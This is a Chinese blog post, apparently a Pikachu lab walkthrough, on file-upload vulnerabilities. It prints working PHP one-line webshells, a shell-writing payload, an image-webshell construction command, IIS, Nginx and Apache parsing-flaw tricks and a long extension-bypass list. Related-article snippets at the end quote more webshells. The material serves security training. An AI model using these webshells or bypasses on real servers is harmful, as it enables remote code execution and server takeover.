文件上传漏洞 picachu

最新推荐文章于 2024-05-12 10:52:44 发布
最新推荐文章于 2024-05-12 10:52:44 发布
阅读量160 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59607911/article/details/133861486
版权

一、什么是文件上传漏洞?

网站没有对上传文件进行严格的限制,导致攻击者利用漏洞上传可执行的恶意文件,从而实现攻击目的。

二、文件上传漏洞类型

黑名单绕过:指定文件名不能上传

白名单绕过:指定文件名能上传

解析漏洞

 

 

 

一句话木马

<?php eval($_REQUEST[a]);?>
 
<?php eval($_GET[a]);?>
 
<?php eval($_POST[a]);?> 

一、client check(修改文件后缀) 

上传文件

使用burp抓包改文件后缀

 

使用?a=phpinfo();命令

最后用蚁剑连接即可命令执行

二、MIME type(修改Content-Type类型)

使用brup抓包,上传jpg文件,将Content-Type的内容复制

 

 

 

上传成功

 

最后用蚁剑连接

三、getimagesize(在图片中插入代码) 

制作图片马: 进入cmd,将jpg文件和php文件合并到一起

copy 1.jpg/b + small.php/a 123123.jpg

 使用brup抓包,插入代码可以放在后面,或者中间,不能放在前面

 查看上传成功

进入后台,使用记事本打开,查看插入的代码

三、解析漏洞 

 IIS解析漏洞

1.目录解析漏洞(/test.asp/1.jpg)
 
IIS5.x/6.0 中,*.asp、*.asa、*.cer、*.cdx 的文件夹,其目录内的文件都会被当做asp文件来解释并执行。例如目录 test.asp,则/test.asp/1.jpg 将被当做asp文件来执行。
 
 
 
2.文件名解析漏洞(test.asp;.jpg)
 
在IIS5.x/6.0 中, 分号后面的不被解析,也就是说 xie.asp;.jpg 会被服务器看成是xie.asp。还有IIS6.0默认的可执行文件除了asp还包含这两种 .asa .cer 。
 
 
 
3.畸形解析漏洞(test.jpg/*.php)
 IIS7.0中,在默认Fast-CGI开启状况下,我们往图片里面写入下面的代码
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[x])?>')?>
将文件保存成test.jpg格式,上传到服务器,假设上传路径为/upload,上传成功后,直接访问/upload/test.jpg/x.php,test.jpg将会被服务器当成php文件执行。
临时解决办法:设置 cgi.fix_pathinfo为0 

Ngnix解析漏洞 

1.畸形解析漏洞(test.jpg/*.php)
nginx<0.8.03
漏洞原因:
· php的配置文件 php.ini 文件中开启了 cgi.fix_pathinfo
· /etc/php5/fpm/pool.d/www.conf中不正确的配置security.limit_extensions,导致允许将其他格式文件作为php解析执行
2.Nginx <0.8.03 空字节代码执行漏洞(xxx.jpg%00.php)
影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
当使用PHP-FastCGI执行PHP时,遇到url里面存在%00空字节时与FastCGI的处理不一致,导致可在非PHP文件中嵌入PHP代码,通过访问url+%00.PHP来执行其中的PHP代码。
例如:"http://127.0.0.1/1.jpg%00.php"会把1.jpg文件(木马文件)当做PHP文件来执行。 

 apache解析漏洞

apache1.x和2.x
 
apache对文件路径从右往左识别,从能识别的后缀开始解析
 
例如 /test.php.php123 由于php123不认识,从.php开始解析
 
apache能解析的拓展名在apache目录下的/conf/mime.types中 

四、文件上传后缀名字典 

php
 
php.
 
php. .
 
php
 
php%00.jpg
 
php2
 
php3
 
php4
 
php5
 
pHp
 
pHp2
 
pHp3
 
pHp4
 
pHp5
 
html
 
htm
 
phtml
 
pht
 
Html
 
Htm
 
pHtml
 
asp
 
aspx
 
asa
 
asax
 
ashx
 
asmx
 
cer
 
aSp
 
aSpx
 
aSa
 
aSax
 
aScx
 
aShx
 
aSmx
 
cEr
 
jsp
 
jspa
 
jspx
 
jsw
 
jxv
 
jspf
 
jtml
 
JSp
 
jSpx
 
jSpa
 
jSw
 
jSv
 
jSpf
 
jHtml
 
asp/test.jpg
 
asp;.jpg
 
cer/test.jpg
 
cer;.jpg
 
asa/test.jpg
 
asa;.jpg
 
aSp/test.jpg
 
aSp;.jpg
 
cEr/test.jpg
 
cEr;.jpg
 
aSa/test.jpg
 
aSa;.jpg
 
jpg/xx.php
 
jpg/xx.pHp
 
jpg/.php
 
jpg/.pHp
 
php.xs.aa
 
php2.aa
 
php3.aa
 
php4.aa
 
php5.aa
 
pHp.aa
 
pHp2.aa
 
pHp3.aa
 
pHp4.aaa
 
pHp5.aa
 
html.aa
 
htm.aa
 
phtml.aa
 
pht.aaa
 
Html.aaa
 
Htm.aa
 
pHtml.aa
 
php::$DATA 

 

悲郁的秋裤
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell
cc
02-24 3645
如果网站存在远程文件包含漏洞,攻击者在服务器2号上写一个一句话木马文件,利用网站远程文件包含该文件,并不能Get网站Shell。由于没有存在文件上传点,而我们又需要服务器本地有个文件存在一句话木马代码,这时候我们想到,日志文件记录报错的方法,就是从日志文件中“写入”一句话木马,然后再利用文件包含来执行日志文件中的一句话木马。在该网站根目录下,新建文件FileInclusion,在此文件夹中新建文件include.php,文件内容为。我们可以利用文件包含漏洞读取任意文件,读取文件的时候有利用条件。
pikachu-不安全文件上传漏洞
koala_king的博客
03-21 454
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。传一个1.php,上传失败,提示和上一关有区别,多了个上传文件后缀名不能为空,由于上传的文件是有后缀名的,也许后端代码会删掉原本的后缀名并根据一些规则替换新的后缀名?如下图所示,刚选好文件,还没有点 “开始上传” 的时候,就弹出了提示 上传的文件不符合要求。
文件上传漏洞
m0_70683009的博客
05-21 1176
如果对方中间件是apache属于低版本,我们可以利用文件上传,上传一个不识别的文件后缀,利用解析漏洞规则成功解析文件,其中的后门代码被执行。,可以被当作php文件进行解析,从最后一个.mmm开始,apache不认识,就往前走,一直到.php,这样即绕过了验证,有可以进行解析。⑤:不删除末尾的点,在后缀名加点(需要在抓到的数据包中加点,直接在文件后缀名加点会命名不成功,它会自动删除点)(2) 当上传文件.asp;上传可以上传的文件,在文件地址后加上/x.php,可以让文件以php代码去执行
php命令注入绕过姿势,挖洞姿势:特殊的上传技巧,绕过PHP图片转换实现远程代码执行(RCE)...
weixin_42510600的博客
03-10 440
我使用了一个特殊的图片上传技巧,绕过PHP GD库对图片的转换处理,最终成功实现了远程代码执行。事情是这样的。当时我正在测试该网站上是否存在sql注入漏洞,不经意间我在网站个人页面发现了一个用于上传头像的文件上传表单。开始时我并没指望在上传功能处发现漏洞,但我决定试试。我上传了一个图片文件,通过截断http数据包,修改jpg图片的文件名后缀为php,然后继续上传。我惊讶的居然上传成功了,我几乎不敢...
2024年【网络安全文件上传漏洞详解】,阿里P7大佬手把手教你
最新发布
2401_84247617的博客
05-12 1017
文件上传后验证文件扩展名往本地保存的时候,%00就会形成一个null字符,截断文件名,只保存%00之前的内容。注:只用于php5.3以下版本,并且要在php扩展设置>>参数开关设置中把magic_quotes_gpc关闭。例3:修改路径值,添加%00,然后提交。与白名单相反,通过限制某些文件格式,使其无法上传之服务端。只存在于APACHE中主要功能:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。
php一句话图片木马过滤_php一句话木马和图片木马的运行方法
weixin_31485835的博客
03-08 2233
标准的写法,直接通过eval执行php代码,如下:@eval($_POST['code']);动态执行assert生成一个木马文件(隐藏性最好的一种)如下:@$_GET['a']($_GET['code']);使用方法:从url中传入下面参数执行后会在当前目录生成一个c.php的文件.如下:/index.php?a=assert&code=${fputs%28fopen%28base64...
文件上传漏洞通关教程
weixin_64713446的博客
09-23 1944
原理:应用程序中存在上传功能,但是对上传文件没有经过合法性校验或者检验函数存在缺陷,导致攻击者可以上传木马文件到服务器application/octet-stream。
中国蚁剑可以连接图片一句话木马吗?
qq_45955869的博客
05-31 1858
蚁剑连接不上图片一句话木马?
pikachu-文件包含漏洞
weixin_50342860的博客
06-13 638
这里写目录标题文件包含漏洞概述本地文件包含漏洞:本地文件包含漏洞演示远程文件包含漏洞:远程文件包含漏洞演示文件包含漏洞:常见防范措施三级目录 文件包含漏洞概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更加简洁,会使用"包含"函数功能。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include fuction.php?>就可以调用函数代码 但有些时候,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前
文件上传漏洞的思维导图
04-19
文件上传漏洞是网络安全领域中的一个重要话题,主要涉及服务器上的文件管理与权限控制。攻击者通过这类漏洞能够上传恶意文件,从而可能对系统造成严重破坏,包括执行任意代码、获取敏感信息甚至完全控制服务器。以下...
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上传的文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
web网站文件上传漏洞和攻击-运维安全详细笔记
06-30
Web 网站文件上传漏洞和攻击 - 运维安全详细笔记...为了防御文件上传攻击,我们需要验证用户上传的文件类型和内容,限制用户上传文件的大小和数量,并使用 Web 应用程序防火墙和入侵检测系统来检测和防御文件上传攻击。
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC...漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。
WebShell文件上传漏洞分析溯源
02-22
2. 文件上传机制安全:确保文件上传机制的安全,例如限制上传文件的类型和大小。 3. 权限配置:确保Web应用程序的权限配置正确,以防止恶意文件的上传。 五、WebShell 文件上传漏洞的检测方法 检测WebShell 文件...
upload-labs
charon145的博客
11-12 360
一.(前端检测,检测文件后缀名)1.查看源代码,上传一个jpg文件 2.抓包,将.jpg改为.php 3.新建标签页打开图像 4.F12进行传参 5.连接蚁剑 文件的后缀决定了文件的类和文件的作用 二.(后端检测,检测content-type) 1.抓包,把ipg改成php 2.新建标签页打开图像 post传参 三.黑名单:不让上传的文件格式 白名单:只让上传的文件格式 php3,php4,php5,phtml都可以被解析成php 四. Add..
解析漏洞总结
baidu_38844729的博客
12-25 376
IIS解析漏洞 IIS6.0 1、目录解析漏洞:*.asp目录下的所有文件都会当做asp脚本执行,比如test.asp/1.jpg,1.jpg被当做asp文件执行 2、;截断,比如test.asp;1.jpg,文件被截断,被解析为test.asp IIS7.0和IIS7.5畸形解析漏洞(php配置问题) 默认fast-cgi开启状况下,在一个文件路径后面加上/xx.php会将原来的文件解析为php文件 比如构造a.jpg/a.php ,会将图片当做php脚本执行,攻击者可以通过上传一句话图片木马获取webs
jpg可以执行php嘛,apache - .php.jpg 此类文件如何在服务器上执行?如何防护?
weixin_33096511的博客
03-17 563
网站被黑,发现对方上传了些 xxx.php.jpg 之类名称的文件,编辑发现存在 这样的代码被插在文件内部。我想知道对方是怎么才能让这样的文件执行?如何防护?软件环境: CentOS 6.5, Apache 2.x, PHP 5.x, 网站为旧版 Drupal 二次开发回复内容:网站被黑,发现对方上传了些 xxx.php.jpg 之类名称的文件,编辑发现存在 这样的代码被插在文件内部。我想知道...
CTFHub技能树 Web-文件上传 详解
weixin_45808483的博客
11-15 2669
无验证 启动环境 我们上传一句话木马 <?php @eval($_POST['shell']);?> 提示了相对路径, 我们直接使用蚁剑连接。 找到flag。 前端验证 上传php文件,前端校验不允许上传php文件 审计代码,只允许上传图片类型 我们先将后缀改为 .jpg 上传成功 再通过burp抓包,修改filename="1.php"和Content-Type: php 发送数据包,页面显示上传成功 使用蚁剑连接 成...
文件上传漏洞各种姿势分析
weixin_46591320的博客
10-25 724
文件上传绕过,奇淫技巧
文件上传漏洞详解:安全与对策
2. **重命名上传文件**:为上传的文件分配随机或唯一的名称,避免与服务器上的其他文件冲突。 3. **限制文件大小**:设置上传文件大小限制,防止过大文件消耗服务器资源。 4. **存储位置安全**:将上传文件存储在不...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值